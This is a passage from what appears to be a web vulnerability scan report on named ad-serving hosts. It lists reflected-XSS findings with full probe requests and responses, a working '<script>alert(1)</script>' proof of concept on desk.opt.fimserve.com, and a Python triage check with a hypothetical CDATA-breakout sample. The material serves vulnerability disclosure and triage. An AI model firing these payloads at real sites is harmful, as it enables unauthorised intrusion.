...[SNIP]...

1.104. http://control.adap.tv/control [isTop parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the isTop request parameter is copied into the HTML document as plain text between tags. The payload 8b341<a>9d6b8a426a3 was submitted in the isTop parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true8b341<a>9d6b8a426a3&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A03%3A34";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:50:14 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true8b341<a>9d6b8a426a3&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.105. http://control.adap.tv/control [keywords parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload f0eed<a>c6c1a053c81 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptvf0eed<a>c6c1a053c81&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A02%3A12";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:52 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29696

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
deo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptvf0eed<a>c6c1a053c81&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.106. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The name of an arbitrarily supplied request parameter is copied into the application's response, which is an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload 8c976<a>f1ee9229782 was submitted in the name of an arbitrarily supplied request parameter and was echoed unmodified.

Because the reflection lands inside CDATA, the <a> is character data to an XML parser rather than a new element, and a browser does not treat a text/xml body as HTML. The scanner accordingly found no working proof of concept for executing JavaScript. Treat this as unencoded reflection rather than confirmed XSS: a manual check should establish whether the application also reflects ]]> unmodified (the sequence that closes a CDATA section) and whether any consumer of this endpoint renders the XML in a way that would execute script. The report tests neither.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5&8c976<a>f1ee9229782=1 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A08%3A37";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:55:17 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29676

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5&8c976<a>f1ee9229782=1]]>
...[SNIP]...

1.107. http://control.adap.tv/control [pageUrl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the pageUrl request parameter is copied into the application's response, an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload d673b<a>3e906cc1dac was submitted in the pageUrl parameter and was echoed unmodified.

Inside CDATA the <a> is character data, not a new element, and the scanner found no working proof of concept for executing JavaScript. Manual review should determine whether ]]> is also reflected unmodified and whether any consumer renders this XML as markup; until then this is unencoded reflection, not confirmed XSS.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxssd673b<a>3e906cc1dac&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A34";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:14 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxssd673b<a>3e906cc1dac&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.108. http://control.adap.tv/control [sessionId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the sessionId request parameter is copied into the application's response, an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload 2f8c4<a>ac8a344f53e was submitted in the sessionId parameter and was echoed unmodified.

Inside CDATA the <a> is character data, not a new element, and the scanner found no working proof of concept for executing JavaScript. Manual review should determine whether ]]> is also reflected unmodified and whether any consumer renders this XML as markup; until then this is unencoded reflection, not confirmed XSS.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf2f8c4<a>ac8a344f53e&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A05%3A12";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:51:52 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
eUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf2f8c4<a>ac8a344f53e&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.109. http://control.adap.tv/control [title parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the title request parameter is copied into the application's response, an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload 9174f<a>7150df027b was submitted in the title parameter and was echoed unmodified.

Inside CDATA the <a> is character data, not a new element, and the scanner found no working proof of concept for executing JavaScript. Manual review should determine whether ]]> is also reflected unmodified and whether any consumer renders this XML as markup; until then this is unencoded reflection, not confirmed XSS.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom9174f<a>7150df027b&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A04%3A02";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:50:42 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29672

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
te%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom9174f<a>7150df027b&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.110. http://control.adap.tv/control [url parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the url request parameter is copied into the application's response, an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload c9735<a>e3cf58f3e7c was submitted in the url parameter and was echoed unmodified.

Inside CDATA the <a> is character data, not a new element, and the scanner found no working proof of concept for executing JavaScript. Manual review should determine whether ]]> is also reflected unmodified and whether any consumer renders this XML as markup; until then this is unencoded reflection, not confirmed XSS.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72c9735<a>e3cf58f3e7c&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A12";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:47:52 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29817

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72c9735<a>e3cf58f3e7c&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&catego
...[SNIP]...

1.111. http://control.adap.tv/control [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the width request parameter is copied into the application's response, an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload 2876f<a>6470f90d1d8 was submitted in the width parameter and was echoed unmodified. Note that the application accepted a non-numeric width without complaint.

Inside CDATA the <a> is character data, not a new element, and the scanner found no working proof of concept for executing JavaScript. Manual review should determine whether ]]> is also reflected unmodified and whether any consumer renders this XML as markup; until then this is unencoded reflection, not confirmed XSS.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=3202876f<a>6470f90d1d8&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A41";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:21 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=3202876f<a>6470f90d1d8&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.112. http://control.adap.tv/control [zid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the zid request parameter is copied into the application's response, an XML document (Content-Type: text/xml) that echoes the whole query string inside a CDATA section of the <Query> element. The payload 8c414<a>3c1703c2f45 was submitted in the zid parameter and was echoed unmodified.

Inside CDATA the <a> is character data, not a new element, and the scanner found no working proof of concept for executing JavaScript. Manual review should determine whether ]]> is also reflected unmodified and whether any consumer renders this XML as markup; until then this is unencoded reflection, not confirmed XSS.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent8c414<a>3c1703c2f45&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A05";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:47:45 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 28091

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent8c414<a>3c1703c2f45&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=t
...[SNIP]...
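
An added triage check for the seven control.adap.tv findings above (my own example, not code from the XSS.CX report or from adap.tv): parse a constructed, trimmed copy of the response with Python's XML parser and ask what it made of the reflected <a>. The BREAKOUT sample is hypothetical and was not observed on the site; it shows only what a parser would do if the reflected value also contained an unmodified ]]>, which is the thing a manual follow-up has to test.

```python
import re
import xml.etree.ElementTree as ET

# Constructed, trimmed stand-in for the control.adap.tv response shown above:
# the scanner's probe (the zid value with marker 8c414<a>3c1703c2f45) is
# echoed inside a CDATA section of a text/xml document.
REFLECTED = (
    "<OneScript><Breadcrumbs><Query><![CDATA["
    "zid=mwvideo_autosilent8c414<a>3c1703c2f45&width=320"
    "]]></Query></Breadcrumbs></OneScript>"
)

# Hypothetical, NOT observed on the site: the shape a manual follow-up would
# look for, where the reflected value first closes the CDATA section with ]]>
# so that the tag is parsed as markup. Whether adap.tv reflects ]]> unmodified
# was not tested in the report.
BREAKOUT = (
    "<OneScript><Breadcrumbs><Query><![CDATA["
    "zid=mwvideo_autosilent8c414]]><a/><![CDATA[3c1703c2f45&width=320"
    "]]></Query></Breadcrumbs></OneScript>"
)


def cdata_reflection_status(body: str, probe: str) -> str:
    """Say what an XML parser makes of a reflected tag-like probe.

    Returns one of:
      not_reflected     probe is not in the body at all
      malformed         body no longer parses as XML (a browser shows a parse
                        error page for text/xml; nothing executes)
      element_injected  the parser built an element from the probe, i.e. the
                        reflection escaped CDATA and is real markup
      attribute_value   probe landed inside an attribute value
      character_data    probe is text inside an element (the CDATA case): no
                        new node, so no HTML injection is demonstrated
    """
    if probe not in body:
        return "not_reflected"
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return "malformed"
    m = re.match(r"</?\s*([A-Za-z][\w.-]*)", probe)
    tag = m.group(1) if m else None
    if tag and any(True for _ in root.iter(tag)):
        return "element_injected"
    for el in root.iter():
        if any(probe in v for v in el.attrib.values()):
            return "attribute_value"
        if probe in (el.text or "") or probe in (el.tail or ""):
            return "character_data"
    return "not_reflected"


if __name__ == "__main__":
    print("as reflected :", cdata_reflection_status(REFLECTED, "<a>"))
    print("hypothetical :", cdata_reflection_status(BREAKOUT, "<a/>"))
```

The first call returns character_data, which is why "Firm" rather than "Certain" is the right confidence here. Even an element_injected result in a text/xml body is not yet script execution; that depends on what renders the document, and the report does not show that.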

1.113. http://desk.opt.fimserve.com/adopt/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://desk.opt.fimserve.com
Path:   /adopt/

Issue detail

The value of the sz request parameter is copied into the response body as plain text. The payload ac8d0<script>alert(1)</script>93bad1c92ea was submitted in the sz parameter and was echoed unmodified.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The context matters: the body is a JavaScript fragment (the _sdc_* assignments), but it is served as Content-Type: text/html;charset=ISO-8859-1 and contains no markup of its own, so a browser that opens the URL directly parses it as HTML and runs the injected <script> element. When the same URL is consumed as a script by the page that references it (the Referer is a Rubicon Project ad frame), the payload sits inside the single-quoted JavaScript string _sdc_sz, and a probe that closes that string would be needed instead; the scanner did not test that context.

Request

GET /adopt/?r=j&l=f9dbaa88-1937-4ef0-a47d-978a82ed1bde&sz=160x600ac8d0<script>alert(1)</script>93bad1c92ea&neg=&ega=&puid=&rnd=4327672 HTTP/1.1
Host: desk.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x30bfc3.js&size_id=9&account_id=7469&site_id=12005&size=160x600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
